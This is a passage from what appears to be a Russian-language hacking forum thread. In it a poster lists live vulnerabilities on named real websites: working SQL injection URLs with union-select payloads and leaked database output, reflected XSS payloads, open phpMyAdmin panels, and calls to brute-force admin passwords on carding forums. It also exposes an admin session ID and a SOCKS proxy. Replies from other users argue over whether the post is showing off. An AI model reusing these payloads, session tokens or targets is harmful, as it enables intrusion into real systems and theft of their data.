можно путь до сервака узнать http://unactpay.ru/index.php?page=1'&cur=1&id=10 А так же скуля http://unactpay.ru/index.php?page=news&cur=1&id=1' <...> f-8" /> </head> <body> </body></html> <h1>Новости</h1><br/><br /> <b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/var/www/unactpay.ru/htdocs/classes/qtrdb.php</b> on line <b>99</b><br /> <br /> <b>Warning</b>: mysql_result(): supplied argument is not a valid MySQL result resource in <b>/var/www/unactpay.ru/htdocs/classes/qtrdb.ph <...> ----- ыы ) я про осмп пока помолчу=/ Так же моя работа=/ http://www.dom3.ru/blog/view/-5867')+union+select+version()--%20 5.0.45 http://www.dom3.ru/blog/view/-5867')+union+select+user()--%20 dom3@localhost читать файлы через лоад файл низзя http://www.dom3.ru/blog/view/-5867')+union+select+table_name+from+information_schema.tables+limit+0,1--%20 таблицы (limitом двигать) + XSS http://dom2.ru/pulse/photogallery/?keyword=%22%3E%3Cscript%3Ealert%28%27+hacking.fm+Hacked%27%29%3C%2Fscript%3E%3C%22 ------- Так же кто то насчёт датинга спрашивал пока не копал=/ но на datingfaces.com можно сделать удаленное выполнение команд на сервере Так же на luckylovers.net XSS http://luckylovers.net/f/main.php?forgot=1&language=%22%3E%3Cscript%3Ealert%28%27Hacking.fm+Hacked%27%29%3C%2Fscript%3E%3C%22 И ещё много много чего интересного=/ /me ушёл ковырять всё --------------- ВОТ вторая SQl http://unactpay.ru/?page=news&cur=1&id=1' --------------- А так же ) http://osmp.ru/search.php?query_string='/// хз пока не копал не смотрел, это мельком. + в дар отдаю первому любящему меня челвоеку laugh.gif http://comedyclub.ru/download/video/she.php + отдам это XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -------------- В кучу Есть доступ к cpanel http://egy2net.com + Ещё не доломал=/.. -------- И так начну с самого шакируещего ))) Все знают http://rapida.ru/ ? Нате я открыл вот что вам http://rapida.ru/phpmyadmin/ заходим без пороля ))))))))))) но базы я ограничил )))) Гостевой вход )))))) cvv2.org:1080 пользуемся соксом дамые и господа biggrin.gif http://www.cvv2.org:2222/ брутим пасс в директ админ laugh.gif так же скажу хоститься этот форум у MIRhosting.com laugh.gif Классный кардинг форум? По моему мнению лучший laugh.gif ----------- http://cvv2.org/phpmyadmin/ вообще убило нах... я в шоке laugh.gif так же кто найдёт уязвимость там ) а я нашёл))) вот пакпка в которую можно что лимбо записать http://www.cvv2.org/clientscript/ Так же вот ссесия админа 4f8af31d4e9d7313abab1d42ae58b4e0 ))))))))))) -------------------- Такая же шняга на xakepy.cc http://www.xakepy.cc/clientscript/ ЛОМАТЬ НЕ БУДУ ) Свои всё таки=/ ---------------------------- Идём дальше ))) я вообще просто не то что угараю я в шоке в офигенном )) http://isell.cc/ класный закрытый кардинг форум да? http://isell.cc/phpmyadmin/ мама божи упаси http://isell.cc:2222/ брутим пороли)))))))))))))) ---------------------------- Кто хочет сломать самый классный сайт загрузок? Го http://loads.cc/phpmyadmin/ Хаха http://www.loads.cc:2222/ Просто я смотрю и думаю... )))) вот так мда=/ ВОТ ЭТО ВСЁ ОБРАЗНО ГЛЯНУЛ. А ЧТО БУДЕТ ЕСЛИ УГЛУбиТСЯ ??)))))
Solide Snake я уже всё слил=/ и всё узнал так что дыра там неизбежна =/ ВСЁ ДЕЛАЛ РАДИ ТОГО ЧТО БЫ ПОКАЗАТЬ ЧТО ВСЁ УЯЗВИМО
Spyder мне пох вообще. Я тебе повторяю я тут не пантуюсь как ты думаешь и не пиарю себя=/ Показал что уязвимые места есть и будут и тут ничего такого нету.По твоей логике шляпа всему античату жмёт
